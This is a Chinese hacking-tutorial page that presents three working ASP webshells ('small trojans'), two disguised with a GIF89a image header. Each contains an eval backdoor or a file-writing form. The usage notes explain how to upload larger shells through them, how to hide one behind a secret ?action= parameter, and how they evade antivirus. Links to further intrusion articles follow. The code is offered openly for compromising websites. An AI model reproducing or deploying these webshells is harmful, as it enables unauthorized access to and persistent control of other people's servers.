几款双功能免杀超强版asp小马

所属分类: 实用技巧 / 安全教程 阅读数: 1627
收藏 0 赞 0 分享
第一款:
复制代码 代码如下:

GIF89a$ ;<hTml>
<%eval request(chr(1))%>
<%
on error resume next
testfile=Request.form("filepath")
msg=Request.form("message")
if Trim(request("filepath"))<>"" then
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.CreateTextFile(testfile,True)
thisfile.Write(""&msg& "")
if err =0 Then
response.write "<font color=red>ok</font>"
else
response.write "<font color=red>no</font>"
end if
err.clear
thisfile.close
set fs = nothing
End if
%>
<form method="POST" ACTION="">
<input type="text" size="20" name="filepath"
value="<%=server.mappath("go.asp")%>"> <BR>
<TEXTAREA NAME="Message" ROWS="5" COLS="40"></TEXTAREA>
<input type="submit" name="Send" value="go">
</form></body></html></body></html>

第二款:
复制代码 代码如下:

GIF89a$ ;<hTml>
<%eval request(chr(1))%>
<% if request("action")="kof97" then %>
<%on error resume next%>
<%ofso="scripting.filesystemobject"%>
<%set fso=server.createobject(ofso)%>
<%path=request("path")%>
<%if path<>"" then%>
<%data=request("dama")%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%="success"%>
<%else%>
<%="false"%>
<%end if%>
<%err.clear%>
<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%=server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%=""%>
<%="<textarea name=dama cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
<% end if %>
</body></html>

第三款:
复制代码 代码如下:

<%set s=server.createObject("Adodb.Stream")%>
<%s.Type=2%>
<%s.Open%>
<%s.CharSet="gb2312"%>
<%s.writetext request("d")%>
<%s.SaveToFile server.mappath("go.asp"),2%>
<%s.Close%>
<%set s=nothing%>
<form>
<textarea name=d cols=80 rows=10 width=32></textarea>
<input type=submit>
</form>

使用说明及介绍:
第一款 功能说明: 用一句话连接进行传马 或直接传马

GIF89a$ ;<hTml>
--[这里的意思相信大家都了解 意思就是 上传图片时起到欺骗的作用.]

<%eval request(chr(1))%>
--[这是就asp一句话木马 这里的 chr(1) 就是asp一句话木马的密码
那么实际chr(1)= 所以密码为 别说你不知知道
重点来了 当你用这个ASP小马时 你可以用这个asp小马来里面的一句话进行传大马 然也可以直接用这个传大马

这里的go.asp就是上传马的地址了 这个自己可以修改 说的够详细吧
第二款:
同上功能就不说了!

<% if request("action")="kof97" then %>
相信懂ASP的一看就明白! 也不多说了
用法是 直接在你小马地址后面加上 ?action=kof97 给个例子吧
http://www.xxx.com/xxx.asp?action=kof97 kof97这个改成自己的!在小马里面改
好处就是 当别人直接访问你的小马时 显示的是空白 无法使用你的小马 与要密码的小马差不多
第三款:
可以说是除了ASP一句话小马之外就非它莫属了! 只有两百多个字节

<%s.SaveToFile server.mappath("go.asp"),2%>
当你打开小马地址就会自动生成go.asp 修改成自己的
此小马要与 一句话小马 或其它小马 配合使用 当你在在输入框写入我们的马 然后点 提交 会自动生成go.asp 小马地址
好处就是 当别人直接访问你的小马时 不管他提交什么马 他不知道你设置的那个文件地址
更多精彩内容其他人还在看

MySQL注入中导出字段内容的研究通过注入导出WebShell

大家都知道,在MySQL中,无法像MSSQL那样执行script.asp?id=1;insert into table (field) values('angel');--来插入数据,因为MySQL里最多就是用union联合查询。
收藏 0 赞 0 分享

Dedecms getip()的漏洞利用代码

flyh4t在非安全发布了dedecms getip()的注射漏洞,漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题,我想这个漏洞很多人都找到了,不过这个漏洞的利用有个地方还是可以说说的,可以直接得到shell:
收藏 0 赞 0 分享

NtGodMode.exe任意密码登录windows系统帐号下载

NTGod NT上帝模式,打开上帝模式可以用任意密码登录任意windows系统帐号,从而达到不增加帐号、不破坏被入侵主机系统的情况下,登录系统帐号。
收藏 0 赞 0 分享

dvbbs 8.2 SQL Injection注射漏洞分析

利用方式:一个典型的sql注射漏洞,按照公告里说的用
收藏 0 赞 0 分享

整理比较全的Access SQL注入参考

不知谁整理的access sql注入资料比较全
收藏 0 赞 0 分享

SQL Injection with MySQL 注入分析

本文作者:angel文章性质:原创 国内能看到php+Mysql注入的文章可能比较少,但是如果关注各种WEB程序的漏洞,就可以发现,其实这些漏洞的文章其实就是一个例子。
收藏 0 赞 0 分享

入侵ASP.net网站的经验附利用代码

爱好入侵的可以用下面的方法,做网站的朋友就需要了解下面的asp.net的利用代码,最好来测试下
收藏 0 赞 0 分享

黑鹰VIP教程-脚本入侵班全部提供下载

爱好脚本的朋友有福了,脚本入侵班资料下载
收藏 0 赞 0 分享

非常不错的脚本入侵基础知识总结第1/2页

简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些 asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。
收藏 0 赞 0 分享

linux提权用的一个技巧

一个linux提权用的技巧,放出来全当找工作攒RP了。 OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本
收藏 0 赞 0 分享
查看更多